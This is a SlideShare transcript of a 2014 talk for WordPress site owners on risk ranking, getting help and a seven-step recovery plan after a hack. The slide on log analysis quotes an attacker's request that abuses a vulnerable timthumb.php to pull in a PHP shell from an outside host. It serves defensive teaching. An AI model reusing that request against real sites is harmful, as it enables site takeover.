Are you ready to be hacked?

442 views
342 views

Published on

This is the presentation which I used during the awesome "WPSession #11: Security for Site Owners". I shared important information about how site owners should react to website attacks. I talked about risk management, assets evaluation and getting help from the right people that know WordPress and care about security.

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
442
On SlideShare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
3
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Are you ready to be hacked?

  1. 1. ARE YOU READY TO BE HACKED? Daniel Kanchev @dvkanchev May 17th, 2014
  2. 2. WHO AM I? • 7+ Years of WordPress experience • 5 Years with SiteGround • Love FOSS • Security Freak • Addicted to extreme sports Daniel Kanchev
  3. 3. IN THIS SESSION • Why Should YOU Care • Assets Evaluation • Getting Help • A KISS Disaster Recovery Plan • Conclusion
  4. 4. WHY MEEEEEEEE ???
  5. 5. IN 2013, 61 % OF REPORTED ATTACKS TARGETED SMALL AND MEDIUM BUSINESSES, UP FROM 50% IN 2012 Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014
  6. 6. 77% OF LEGITIMATE WEBSITES HAD EXPLOITABLE VULNERABILITIES. 1-IN-8 HAD A CRITICAL VULNERABILITY. Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014
  7. 7. MEGA BREACHES: RESULTING IN PERSONAL DETAILS OF OVER 10 MILLION IDENTITIES EXPOSED IN AN INDIVIDUAL INCIDENT. Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014
  8. 8. THERE WERE EIGHT IN 2013, COMPARED WITH ONLY ONE IN 2012! + 700 % Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014
  9. 9. ATTAKS PER DAY 2010 2012 2013 570,000 464,000 190,000 Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014
  10. 10. ASSETS EVALUATION
  11. 11. MODULAR DESIGN • Divide your site in logical components • Allocate weight to all components • Sort components based on criticality
  12. 12. EXAMPLE TABLE Component Weight WooCommerce plugin 4 Custom theme 3 Gallery plugin 2 Contact form 1
  13. 13. GETTING HELP
  14. 14. IDENTIFY 
 WHO CAN HELP YOU • The support team of your web host • Plugin and theme developers • Third party companies • Security specialists
  15. 15. THE SUPPORT TEAM OF YOUR WEB HOST • Website diagnostics • Website backups and restores • Log analysis • WordPress core/plugin/theme upgrades • Regular Security Audits • Malware notifications and malicious code cleaning
  16. 16. PLUGIN AND THEME DEVELOPERS/SUPPORT • New plugin/theme versions • Security updates • Migration to new versions of your themes/plugins
  17. 17. DISASTER RECOVERY PLAN
  18. 18. 7 ”EASY” STEPS 1. DON’T PANIC! 2. Create a copy of the hacked site + all logs 3. Quarantine your site 4. Remove the malicious code 5. Check the archived logs for the source of the attack 6. Resolve the security issues that caused the problem 7. “Unquarantine” your site
  19. 19. 1. BACKUP YOUR HACKED SITE 1. mysqldump -uU -pP DB > yoursitefolder/DB.sql 2. tar zcvf backup.tar.gz yoursitefolder How to backup: Why to do this: This is needed, so that you can later find out
 the source of the attack/vulnerability!
  20. 20. USEFUL LOGS
 (on a cPanel server) • /var/log/messages - FTP log for PureFTPd • /usr/local/apache/domlogs/DOMAIN.COM - Apache access log • /var/log/exim_mainlog - Exim mail server log • /usr/local/cpanel/logs/access_log - cPanel File Manager log • /var/log/secure - SSH connections log
  21. 21. 2. QUARANTINE YOUR SITE + CHANGE PASSWORDS 1. Protect your users and visitors 2. Disallow Google to access your hacked site 3. Keep hackers away during the cleaning of the site
  22. 22. USE .HTACESS MAGIC <IfModule mod_rewrite.c>
 RewriteEngine On
 RewriteCond %{REMOTE_ADDR} !^123.56.89.12 RewriteCond %{DOCUMENT_ROOT}/maintenance.html -f RewriteCond %{DOCUMENT_ROOT}/maintenance.enable -f RewriteCond %{SCRIPT_FILENAME} !maintenance.html RewriteRule ^.*$ /maintenance.html [R=503,L] ErrorDocument 503 /maintenance.html
 Header Set RetryAfter "14400"
 Header Set CacheControl "maxage=0, nostore" </IfModule>
  23. 23. 3. REMOVE THE MALICIOUS CODE 1. Restore the site from a clean backup 
 OR
 2. Clean the affected files/database tables
  24. 24. 4. ARCHIVED LOGS ANALYSIS • Is complicated • Is time consuming • Requires advanced HTTP knowledge • Should be performed by security specialists
  25. 25. EXAMPLE - THE TIMTHUMB HACK 189.100.29.167 - [12/Apr/2014:06:53:41 +1000] “GET / wpcontent/themes/premiumtheme/timthumb.php? src=http://www.blogger.com.ex l.ro/max/wp-mails.php HTTP/1.1ʹ′ʹ′ 301 – “-” “Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]” 189.100.29.167 - IP of the attacker. premiumtheme/timthumb.php - Vulnerable script. wp-mails.php - PHP shell script.
  26. 26. 5. RESOLVE THE SECURITY ISSUES • Upgrade WP core, plugins and themes • Upgrade server software if needed • Patch your code and use WAF in case there are no upgrades available
  27. 27. 6. UNQUARANTINE YOUR SITE + CHANGE PASSWORDS • Remove the maintenance page • Inform users about the breach if needed • Keep an eye on your files/DB
  28. 28. CONCLUSION • Web security is complicated! • Rely on partners to recover your site. • Be ready to manage the whole process. • Know your assets. • Make sure you have good security awareness. • Security is a journey - NOT a destination!
  29. 29. THANK YOU

×